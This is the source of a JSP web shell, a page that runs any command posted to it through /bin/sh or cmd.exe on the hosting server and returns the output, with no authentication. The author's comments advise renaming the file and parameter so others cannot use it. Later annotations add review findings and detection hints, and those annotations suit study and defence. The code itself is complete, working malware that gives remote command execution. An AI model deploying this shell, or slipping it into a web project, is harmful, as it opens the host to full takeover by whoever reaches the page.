simple_jsp_web_shell_post.jsp
<%@page import="java.util.Arrays"%>
<%@page import="java.io.IOException"%>
<%@page import="java.nio.charset.StandardCharsets"%>
<%@page import="java.io.InputStream"%>
<%-- Copyright (c) 2021 Ivan Šincek --%>
<%-- v3.0 --%>
<%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
<%-- Works on Linux OS, macOS, and Windows OS. --%>
<%-- modify the script name and request parameter name to random ones to prevent others from accessing and using your web shell --%>
<%-- don't forget to change the script name in the action attribute --%>
<%
// Name of the request parameter whose value is executed as an operating-system command below.
// Defender note: "command" is only the author's default and the header comments tell the
// operator to rename it, so the parameter name alone is a weak indicator.
String parameter = "command";
// Text that the page later prints inside its <pre> element.
String output = "";
// Gate: intended for POST requests that carry a non-blank value for the parameter.
// NOTE(review): the method is compared with == (reference identity) rather than equals().
// No authentication or authorization check appears anywhere in this scriptlet.
if (request.getMethod() == "POST" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
// Choose the command interpreter from the OS name reported by the JVM.
String os = System.getProperty("os.name").toUpperCase();
String shell = null;
if (os.contains("LINUX") || os.contains("MAC")) {
shell = "/bin/sh -c";
} else if (os.contains("WIN")) {
shell = "cmd.exe /c";
} else {
output = "SYS_ERROR: Underlying operating system is not supported\n";
}
if (shell != null) {
Process process = null;
InputStream stdout = null;
byte[] buffer = null;
try {
// The trimmed request value is formatted, unvalidated, into the command string and executed,
// with "2>&1" appended so that error output joins standard output.
// The child process is started by the JVM that hosts this page.
// Detection: an application-server JVM spawning /bin/sh or cmd.exe as a child process is the
// main host-side signal for a page like this, alongside an unexpected .jsp file in the web root.
process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
stdout = process.getInputStream();
buffer = new byte[1024];
int bytes = 0;
// Read the child's output in chunks of up to 1024 bytes until read() returns 0 or -1;
// each chunk is decoded as UTF-8 on its own and appended to the result.
do {
bytes = stdout.read(buffer, 0, buffer.length);
if (bytes > 0) {
output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
}
} while (bytes > 0);
// NOTE(review): as shown here, both calls replace a character with itself and change nothing.
// They look like HTML-entity escaping that was decoded when the page was rendered; confirm
// against the raw file. As written, command output reaches the HTML response unescaped.
output = output.replace("<", "<");
output = output.replace(">", ">");
} catch (IOException ex) {
// On an I/O failure the exception text replaces the command output shown to the requester.
output = String.format("ERROR: %s\n", ex);
} finally {
// Cleanup: close the output stream (close errors are ignored), destroy the child process,
// and overwrite the read buffer with zeros. The accumulated output string is not cleared here.
if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
if (process != null) { process.destroy(); process = null; }
if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
}
}
// Author's alternative: print the result directly from the scriptlet instead of through the
// HTML document that follows; it is left commented out.
// if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
// out.print("<pre>" + output + "</pre>"); output = null; System.gc();
}
%>
<%@page contentType="text/html" pageEncoding="UTF-8"%>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Simple JSP Web Shell</title>
<meta name="author" content="Ivan Šincek">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<form method="post" action="./simple_jsp_web_shell_post.jsp">
<input name="<% out.print(parameter); %>" type="text" required="required" autofocus="autofocus" placeholder="Enter Command">
</form>
<pre><% out.print(output); output = null; System.gc(); %></pre>
</body>
</html>